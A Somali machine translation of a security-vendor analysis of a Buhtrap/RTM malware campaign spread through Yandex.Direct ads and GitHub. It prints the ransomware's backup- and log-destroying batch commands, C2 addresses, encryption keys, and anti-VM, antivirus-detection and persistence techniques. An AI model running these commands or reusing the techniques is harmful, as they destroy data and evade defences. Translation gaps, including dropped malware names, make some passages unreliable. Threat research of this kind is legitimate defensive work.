Si aad u beegsato xisaabiyeyaasha weerarka internetka, waxaad isticmaali kartaa dukumentiyada shaqada ee ay ka raadiyaan internetka. Tani waa qiyaas ahaan waxa ay koox internet ka samaynaysay dhawrkii bilood ee la soo dhaafay, iyaga oo qaybinaya albaabada danbe ee la yaqaan. и , iyo sidoo kale encryptors iyo software lagu xado lacagaha crypto. Inta badan bartilmaameedyadu waxay ku yaalaan Ruushka. Weerarka ayaa lagu qaaday xayeysiis xaasidnimo ah oo lagu dhejiyay Yandex.Direct. Dhibbanayaasha suurtagalka ah ayaa lagu jiheeyay shabakad halkaas oo laga codsaday inay soo dejiyaan fayl xaasidnimo ah oo loo ekeysiiyay qaab dukumeenti ah. Yandex ayaa meesha ka saartay xayaysiiskii xaasidnimada lahaa digniinteena ka dib.
Koodhka isha Buhtrap ayaa si toos ah online-ka looga siidaayay wakhti hore si qof kastaa u isticmaalo. Ma hayno macluumaad ku saabsan helitaanka koodhka RTM.
Maqaalkan waxaan kuugu sheegi doonaa sida ay weerarradu u qaybiyeen malware iyaga oo isticmaalaya Yandex.Direct oo ay ku marti galiyeen GitHub. Boostu waxay ku soo gabagabeyn doontaa falanqaynta farsamada ee malware-ka.
Buhtrap iyo RTM waxay ku soo noqdeen ganacsigooda
Habka faafinta iyo dhibbanayaasha
Culaysyada kala duwan ee la geeyo dhibbanayaasha ayaa wadaaga hab faafin guud. Dhammaan faylasha xaasidnimada ah ee ay abuureen weeraryahanadu waxa la dhigay laba kayd oo kala duwan oo GitHub ah.
Caadi ahaan, kaydku waxa uu ka koobnaa hal fayl oo xaasidnimo ah oo la soo dejisan karo, kaas oo si joogto ah isu beddelay. Maadaama GitHub ay kuu ogolaato inaad aragto taariikhda isbeddelada kaydka, waxaan arki karnaa waxa malware la qaybiyay intii lagu jiray muddo cayiman. Si loo qanciyo dhibbanaha inuu soo dejiyo faylka xaasidnimada ah, website-ka blanki-shabloni24[.]ru, ee ku cad shaxanka sare, ayaa la isticmaalay.
Naqshadeynta goobta iyo dhammaan magacyada faylasha xaasidnimada leh waxay raacaan hal fikrad - foomamka, qaababka, qandaraasyada, muunado, iwm. Iyadoo la tixgelinayo in Buhtrap iyo RTM software hore loo isticmaalay weerarrada xisaabiyeyaasha ee hore, waxaan u maleynay in Istaraatiijiyada ololaha cusub waa isku mid. Su'aasha kaliya ayaa ah sida dhibbanuhu ku helay bogga internetka ee weerarka.
Caabuqa
Ugu yaraan dhowr dhibane oo suurtagal ah oo ku dhammaaday goobtan ayaa waxaa soo jiitay xayeysiisyo xaasidnimo leh. Hoos waxaa ku yaal tusaale URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Sida aad ka arki karto isku xirka, bannerka waxaa lagu dhajiyay golaha xisaabinta ee sharciga ah bb.f2[.]kz. Waxaa muhiim ah in la ogaado in boodhadhku ay ka soo muuqdeen goobo kala duwan, dhamaantoodna waxay lahaayeen aqoonsi isku mid ah ol'olaha (blanki_rsya), iyo inta badan ee la xidhiidha adeegyada xisaabinta ama sharciga. URL-ku wuxuu muujinayaa in dhibbanaha suurtagalka ah uu adeegsaday codsiga "qaabka qaansheegta soo dejinta," kaas oo taageeraya mala-awaalkayaga weerarrada la beegsaday. Hoos waxaa ku yaal boggaga boodhadhku ka soo baxeen iyo weydiimaha raadinta ee u dhigma.
- soo deji foomka qaansheegta - bb.f2[.] kz
- qandaraas muunad - Ipopen[.]ru
- muunada cabashada codsiga - 77metrov[.] ru
- foomka heshiiska - blank-dogovor-kupli-prodazhi[.]ru
- muunad codsi maxkamadeed - zen.yandex[.] ru
- cabashada muunada - yurday[.]ru
- foomamka qandaraaska muunada – Regforum[.]ru
- foomka qandaraaska - assistentus[.] ru
- muunad heshiis guri - napravah[.] com
- tusaalooyinka qandaraasyada sharciga ah - avito[.]ru
Goobta blanki-shabloni24[.]ru waxa laga yaabaa in loo habeeyey si ay ugu gudubto qiimayn muuqaal ah oo fudud. Caadi ahaan, xayaysiis tilmaamaya goob xirfadle u eeg oo xiriir la leh GitHub uma eka wax si cad u xun. Intaa waxaa dheer, weeraryahanadu waxay geliyeen faylal xaasidnimo ah kaydka muddo xaddidan oo keliya, lagana yaabo inta lagu jiro ololaha. Inta badan, kaydka GitHub waxa ku jiray kayd zip madhan ama faylka EXE maran. Sidaa darteed, weeraryahanadu waxay u qaybin karaan xayeysiiska Yandex.Direct ee goobaha ay u badan tahay inay soo booqdaan xisaabiyeyaasha kuwaas oo ka jawaabaya su'aalo raadin gaar ah.
Marka xigta, aan eegno culeysyada kala duwan ee habkan loo qaybiyay.
Falanqaynta Mushahar bixinta
Taariikhda qaybinta
Ololaha xaasidnimada ah wuxuu bilaabmay dhamaadka Oktoobar 2018 wuxuuna shaqeeyaa wakhtiga qorista. Maadaama kaydka oo dhan uu ahaa mid si guud looga heli karo GitHub, waxaanu soo diyaarinay wakhti sax ah oo qaybinta lix qoys oo malware ah (eeg sawirka hoose). Waxaan ku darnay xariiq muujinaya markii la helay isku xirka banner, sida lagu cabbiray telemetry ESET, marka la barbardhigo taariikhda git. Sida aad arki karto, tani waxay si fiican ula xiriirtaa helitaanka culeyska culeyska ee GitHub. Farqiga u dhexeeya dhammaadka Febraayo waxaa lagu sharxi karaa xaqiiqda ah in aanaan haysan qayb ka mid ah taariikhda isbeddelka sababtoo ah kaydka ayaa laga saaray GitHub ka hor inta aanan si buuxda u helin.
Jaantuska 1. Taariikhda qaybinta malware.
Shahaadooyinka Saxeexa Koodhka
Ololuhu waxa uu isticmaalay shahaadooyin badan. Qaarkood waxaa saxeexay in ka badan hal qoys oo malware ah, taas oo sii tusinaysa in muunado kala duwani ay iska lahaayeen olole isku mid ah. In kasta oo la heli karo furaha gaarka ah, hawlwadeenadu si nidaamsan uma saxeexin binaries mana u isticmaalin furaha dhammaan muunadaha. Dabayaaqadii Febraayo 2019, weeraryahanadu waxay bilaabeen inay abuuraan saxiixyo aan sax ahayn iyagoo isticmaalaya shahaado ay Google leedahay oo ayan haysan furaha gaarka ah.
Dhammaan shahaadooyinka ku lug leh ololaha iyo qoysaska malware-ka ay saxeexaan waxay ku taxan yihiin shaxda hoose.
Waxaan sidoo kale u isticmaalnay shahaadooyinkan saxiixa koodka si aan xiriir ula yeelano qoysaska kale ee malware. Inta badan shahaadooyinka, ma aanu helin muunado aan lagu qaybin kaydka GitHub. Si kastaba ha ahaatee, shahaadada TOV "MARIYA" ayaa loo isticmaalay in lagu saxiixo malware-ka ka tirsan botnet-ka , adware iyo macdan qodayaasha. Uma badna in malware-kan uu la xidhiidho ololahan. Waxay u badan tahay, shahaadada waxaa lagu iibsaday mugdiga.
Win32/Filecoder.Buhtrap
Qaybtii ugu horaysay ee dareenkeena soo jiidatay waxay ahayd Win32/Filecoder.Buhtrap oo dhawaan la helay. Kani waa faylalka binary Delphi oo mararka qaarkood la baakadeeyay. Waxaa inta badan la qaybiyay Febraayo-Maarso 2019. Waxay u dhaqmaysaa sida ku habboon barnaamijka ransomware - waxay baadhaysaa darawallada maxalliga ah iyo galka shabakada waxayna siraysaa faylalka la ogaaday. Uma baahna isku xirka internetka in la jabiyo sababtoo ah lama xiriirto serverka si loo diro furayaasha sirta ah. Taa beddelkeeda, waxay ku dartay "calaamad" dhammaadka farriinta madaxfurashada, waxayna soo jeedinaysaa isticmaalka iimaylka ama Bitmessage si aad ula xiriirto hawlwadeennada.
Si loo sireeyo inta badan ee kheyraadka xasaasiga ah ee suurtogalka ah, Filecoder.Buhtrap wuxuu wadaa dun loogu talagalay in lagu xiro software-yada muhiimka ah oo laga yaabo in ay haystaan maamulayaal faylal furan oo ay ku jiraan macluumaad qiimo leh oo faragelin kara sirta. Nidaamyada la beegsanayo ayaa ah inta badan nidaamyada maareynta xogta (DBMS). Intaa waxaa dheer, Filecoder.Buhtrap waxay tirtirtaa faylalka log iyo kaydinta si ay uga dhigto soo kabashada xogta mid adag. Si tan loo sameeyo, ku socodsii qoraalka dufcadda hoose.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap waxay isticmaashaa adeega internetka ee IP Logger-ka ee sharciga ah ee loogu talagalay in lagu ururiyo macluumaadka ku saabsan booqdayaasha mareegaha. Tan waxaa loogu talagalay in lagu raadraaco dhibbanayaasha madax-furashada, taas oo ah mas'uuliyadda khadka taliska:
mshta.exe "javascript:document.write('');"
Faylasha sirta ah ayaa la doortaa haddii aysan ku habboonayn saddex liis oo ka reebis ah. Marka hore, faylasha wata kordhinta soo socota lama sir ah: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys iyo .fiid. Marka labaad, dhammaan faylasha ay dariiqa buuxda ka kooban tahay xargaha hagaha ee liiska hoose waa laga saaray.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Saddexaad, magacyada faylalka qaarkood ayaa sidoo kale laga saaray sirta, oo ay ka mid yihiin magaca faylka ee farriinta madaxfurashada. Liiska ayaa lagu soo bandhigay hoos. Sida iska cad, dhammaan waxyaabahan ka reeban waxaa loogu talagalay in lagu ilaaliyo mishiinka, laakiin leh tayada ugu yar ee wadada.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Nidaamka sirta faylka
Marka la fuliyo, malware-ku wuxuu abuuraa lamaane fure oo 512-bit RSA ah. Jibbaaraha gaarka ah (d) iyo modules (n) ayaa markaa lagu sir sir sir adag 2048-bit furaha dadweynaha (jibbaha dadweynaha iyo modules), zlib-koobaysan, iyo base64 oo lagu dhejiyay. Koodhka ka mas'uulka ah tan waxa lagu muujiyay sawirka 2.
Jaantuska 2. Natiijadii kala furfurida Hex-rays ee habka 512-bit RSA ee habka jiilka muhiimka ah.
Hoos waxaa ku yaal tusaale qoraal cad oo leh fure gaar ah oo la sameeyay, kaas oo calaamad u ah farriinta madax furashada.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Furaha guud ee weeraryahannada ayaa hoos ku qoran.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Faylasha waxaa lagu sireeyay iyadoo la adeegsanayo AES-128-CBC oo leh fure 256-bit ah. Fayl kasta oo sir ah, fure cusub iyo vector cusub ayaa la soo saarayaa. Macluumaadka muhiimka ah waxaa lagu daraa dhamaadka faylka sir ah. Aynu tixgelinno qaabka faylka sir ah.
Faylasha qarsoodiga ah waxay leeyihiin madaxa soo socda:
Xogta faylka isha ee lagu daro qiimaha sixirka VEGA waxaa lagu sireeyay 0x5000 ee ugu horreeya. Dhammaan macluumaadka ka-saarista waxay ku lifaaqan yihiin fayl qaab-dhismeedkan leh:
-Calamadaha cabbirka faylka waxa ku jira calaamad muujinaysa in faylku ka weyn yahay 0x5000 bytes cabbir ahaan.
- AES furaha furaha = ZlibCompress(RSAEncrypt(Furaha AES + IV, furaha guud ee labada furaha RSA))
- RSA furaha furaha = ZlibCompress(RSAEncrypt (furaha gaarka ah ee RSA, furaha guud ee RSA ee adag))
Win32/ClipBanker
Win32/ClipBanker waa qayb si aan kala go' lahayn loo qaybiyay dabayaaqadii Oktoobar ilaa horraantii Disembar 2018. Doorkeedu waa in la kormeero waxa ku jira shaxanka, waxay raadisaa ciwaannada boorsooyinka cryptocurrency. Markii la go'aamiyay ciwaanka jeebka ee bartilmaameedka ah, ClipBanker wuxuu ku beddelay ciwaanka la rumaysan yahay inuu leeyahay hawl-wadeennada. Tijaabooyinkii aanu baadhnay ma ahayn kuwo feerka ah mana la daboolin. Habka kaliya ee loo isticmaalo in lagu qariyo hab-dhaqanka waa qarsoodiga xargaha. Cinwaannada jeebka hawl-wadeenada waa la sireeyay iyadoo la isticmaalayo RC4. Lacagaha loo yaqaan 'cryptocurrencies' waa Bitcoin, Bitcoin cash, Dogecoin, Ethereum iyo Ripple.
Inta lagu guda jiro xilliga malware-ku uu ku faafay jeebadaha Bitcoin ee weerarka, qadar yar ayaa loo diray VTS, taas oo shaki gelinaysa guusha ololaha. Intaa waxaa dheer, ma jiraan wax caddayn ah oo soo jeedinaya in macaamiladani ay la xiriireen ClipBanker gabi ahaanba.
Win32/RTM
Qaybta Win32/RTM waxaa la qaybiyay dhowr maalmood horraantii Maarso 2019. RTM waa bangi Trojan ah oo ku qoran Delphi, oo loogu talagalay nidaamyada bangiyada fog. 2017, cilmi-baarayaasha ESET ayaa daabacay Barnaamijkan, sharraxaadda ayaa weli khuseeya. Janaayo 2019, Palo Alto Networks sidoo kale waa la sii daayay .
Buhtrap Loader
In muddo ah, soo dejiye ayaa laga heli jiray GitHub kaas oo aan la mid ahayn qalabkii hore ee Buhtrap. Wuu u soo jeestay https://94.100.18[.]67/RSS.php?<some_id> si aad u hesho marxaladda xigta oo si toos ah ugu shubto xusuusta. Waxaan kala saari karnaa laba dabeecadood oo ka mid ah xeerka marxaladda labaad. URL-kii ugu horreeyay, RSS.php ayaa si toos ah uga gudubtay albaabka dambe ee Buhtrap - albaabka dambe wuxuu aad ugu eg yahay kan la heli karo ka dib koodhka isha ayaa soo daatay.
Waxa xiisaha lihi leh, waxaanu aragnaa ololeyaal dhawr ah oo Buhtrap dhabarka dambe ku leh, waxaana la sheegay inay wadaan hawl-wadeenno kala duwan. Xaaladdan oo kale, farqiga ugu weyni waa in albaabka dambe si toos ah loogu dhejiyo xusuusta oo aan isticmaalin nidaamka caadiga ah ee habka geynta DLL ee aan ka hadalnay. . Intaa waxaa dheer, hawl-wadeenadu waxay beddeleen furaha RC4 ee loo isticmaalo in lagu sireeyo taraafikada shabakada serverka C&C. Inta badan ololayaasha aanu aragnay, hawl-wadeenadu iskuma dhibin beddelka furahaan.
Midda labaad, habdhaqanka kakan ayaa ah in RSS.php URL loo gudbiyay mid kale. Waxa ay hirgelisay wax qariban, sida dib u dhiska miiska soo dejinta firfircoon. Ujeedada bootloader-ku waa in lala xidhiidho serverka C&C [.]com/api/F27F84EDA4D13B15/2, dir diiwaanka oo sug jawaabta. Waxay u habaysaa jawaabta sida blob, waxay ku shubtaa xusuusta waxayna fulisaa. Culayska aan aragnay isagoo fulinaya rarkan wuxuu ahaa isla Buhtrap dhabarka dambe, laakiin waxaa jiri kara qaybo kale.
Android/Spy.Banker
Waxa xiiso leh, qayb Android ah ayaa sidoo kale laga helay kaydka GitHub. Waxa uu ku sugnaa laanta ugu weyn hal maalin oo kaliya - Noofambar 1, 2018. Marka laga reebo in lagu dhejiyo GitHub, telemetry ESET ma helin wax caddayn ah oo la qaybiyay malware-kan.
Qaybta waxa loo marti galiyay sidii Xidhmada Codsiga Android (APK). Aad ayaa loo qariyey. Dabeecadda xaasidnimada ah waxay ku qarsoon tahay JAR sir ah oo ku taal APK. Waxaa lagu sireeyay RC4 iyadoo la isticmaalayo furahan:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Furaha isku midka ah iyo algorithm ayaa loo adeegsadaa si loo xafido xargaha. JAR waxay ku taal APK_ROOT + image/files. 4ta bytes ee ugu horeeya ee faylka waxa ku jira dhererka sirta ah ee JAR, kaas oo bilaabma isla markiiba ka dib goobta dhererka.
Markii aanu furnay feylka, waxaanu ogaanay inuu ahaa Anubis - hore bangiga Android. Malware-ku wuxuu leeyahay sifooyinka soo socda:
- duubista makarafoonka
- sawir qaade
- helitaanka isku-duwayaasha GPS
- keylogger
- sirta xogta qalabka iyo dalabka madax furashada
- diritaanka spam
Waxa xiisaha lihi leh, bangigu waxa uu Twitter-ka u adeegsaday kanaal isgaarsiineed oo gurmad ah si uu u helo server kale oo C&C ah. Muunadda aan falanqeynay waxay isticmaashay xisaabta @JonesTrader, laakiin waqtiga falanqaynta mar horeba waa la xannibay.
Bangigu wuxuu ka kooban yahay liiska codsiyada la beegsanayo ee aaladda Android. Way ka dheer tahay liiska lagu helay daraasadda Sophos. Liiska waxaa ku jira codsiyo badan oo bangiyada ah, barnaamijyada wax iibsiga onlaynka ah sida Amazon iyo eBay, iyo adeegyada cryptocurrency.
MSIL/ClipBanker.IH
Qaybtii u dambaysay ee loo qaybiyay qayb ka mid ah ololahan waxa ay ahayd .NET Windows executable, oo soo muuqatay March 2019. Inta badan noocyada la darsay waxaa lagu soo xiray ConfuserEx v1.0.0. Sida ClipBanker, qaybtani waxay isticmaashaa sabuuradda. Hadafkiisu waa noocyo kala duwan oo loo yaqaan 'cryptocurrencies', iyo sidoo kale waxay ku bixiyaan Steam. Intaa waxaa dheer, wuxuu isticmaalaa adeegga IP Logger si uu u xado furaha gaarka ah ee Bitcoin ee WIF.
Hababka Ilaalinta
Marka lagu daro faa'iidooyinka ay ConfuserEx bixiso ee ka hortagga khaladaadka, daadinta, iyo faragelinta, qaybta waxaa ka mid ah awoodda lagu ogaanayo alaabada ka hortagga iyo mashiinnada farsamada.
Si loo xaqiijiyo in uu ku dhex socdo mishiin dalwad ah, malware-ku waxa uu isticmaalaa khadka talisyada Windows WMI ee ku dhex dhisan (WMIC) si uu u codsado macluumaadka BIOS, kuwaas oo kala ah:
wmic bios
Kadibna barnaamijku wuxuu soosaaraa soosaarka amarka wuxuuna raadiyaa ereyada muhiimka ah: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Si loo ogaado badeecooyinka fayraska, malware-ku wuxuu u soo diraa codsiga Qalabka Maareynta Windows (WMI) isagoo isticmaalaya Xarunta Amniga Windows ManagementObjectSearcher API sida hoos ka muuqata. Ka dib markii laga soo gooyay base64 wicitaanku wuxuu u eg yahay sidan:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Jaantuska 3. Habka lagu aqoonsanayo alaabada antivirus.
Intaa waxaa dheer, malware-ku wuxuu hubiyaa iyo in kale , Aalad ka hortagta weerarrada sabuuradaha oo, haddii uu socdo, joojiya dhammaan dunta hawshaas, si ay u curyaamiso ilaalinta.
Adkeysiga
Nooca malware-ka aanu ku barannay nuqullo laftiisa %APPDATA%googleupdater.exe oo dejisa sifada "qarsoon" ee hagaha google-ka. Kadibna waxay beddeshaa qiimaha SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ee diiwaanka Windows oo ku dara jidka updater.exe. Sidan, malware-ka ayaa la dili doonaa mar kasta oo isticmaaluhu soo galo.
Dhaqanka xaasidnimada leh
Sida ClipBanker, malware-ku wuxuu la socdaa waxa ku jira sabuuradda oo wuxuu raadiyaa ciwaannada jeebka cryptocurrency, marka la helo, wuxuu ku beddelaa mid ka mid ah ciwaannada hawlwadeenka. Hoos waxaa ku yaal liiska cinwaannada bartilmaameedka ah ee ku saleysan waxa laga helay koodka.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Nooc kasta oo cinwaan ah waxa jira odhaah joogto ah oo u dhiganta. Qiimaha STEAM_URL waxa loo isticmaalaa in lagu weeraro nidaamka Steam, sida laga arki karo odhaahda caadiga ah ee loo isticmaalo in lagu qeexo kaydka:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kanaalka fidinta
Marka lagu daro beddelka ciwaannada kaydka, malware-ku waxa uu bartilmaameedsadaa furayaasha gaarka ah ee WIF ee Seeraar, Seeraar Core iyo Electrum Bitcoin boorsooyinka. Barnaamijku waxa uu u isticmaalaa plogger.org kanaal faaqidaad ah si uu u helo furaha gaarka ah ee WIF. Si tan loo sameeyo, hawl-wadeenadu waxay ku daraan xogta muhiimka ah ee gaarka ah cinwaanka Isticmaalaha-Wakiilka HTTP, sida hoos ku cad.
Jaantuska 4. IP Logger console oo leh xogta wax soo saarka.
Hawl-wadeenadu ma isticmaalin iplogger.org si ay u nadiifiyaan boorsooyinka. Waxay u badan tahay inay maciin bideen hab ka duwan sababta oo ah xadka 255 ee goobta User-Agentlagu soo bandhigay Interface webka IP Logger Muunadaha aan baranay, server-ka kale ee wax soo saarka ayaa lagu keydiyay doorsoomiyaha deegaanka DiscordWebHook. Waxa la yaab leh, doorsoomaha deegaanka laguma meelayn meel kasta oo koodka ah. Tani waxay soo jeedinaysaa in malware-ku uu wali ku jiro horumarinta iyo doorsoomayaasha loo qoondeeyay mashiinka tijaabada ee hawlwadeenka.
Waxa jirta calaamad kale oo muujinaysa in barnaamijku ku jiro horumarka. Faylka binary-ga waxa ku jira laba URL iplogger.org, labadabana waa la waydiiyaa marka xogta la soo saaro. Codsiga mid ka mid ah URL-yadan, qiimaha goobta tixraaca waxaa ka horreeya "DEV /". Waxaan sidoo kale helnay nooc aan baakad ahayn iyadoo la adeegsanayo ConfuserEx, qaataha URL-kan waxaa lagu magacaabaa DevFeedbackUrl. Iyada oo ku saleysan magaca beddelka deegaanka, waxaan aaminsanahay in hawl-wadeenadu ay qorsheynayaan inay isticmaalaan adeegga sharciga ah ee Discord iyo nidaamkeeda dhex galka shabakadda si ay u xadaan boorsooyinka cryptocurrency.
gunaanad
Ololahan ayaa tusaale u ah adeegsiga adeegyada xayaysiisyada ee sharciga ah ee weerarrada internetka. Nidaamku wuxuu bartilmaameedsanayaa ururada Ruushka, laakiin lama yaabi doonno inaan aragno weerarkan oo kale oo la adeegsanayo adeegyo aan Ruush ahayn. Si looga fogaado tanaasul, isticmaalayaashu waa inay ku kalsoonaadaan sumcadda isha software-ka ay soo dejiyaan.
Liis dhamaystiran oo ah tilmaamayaasha tanaasulka iyo sifooyinka MITER ATT&CK ayaa laga heli karaa halkan .
Source: www.habr.com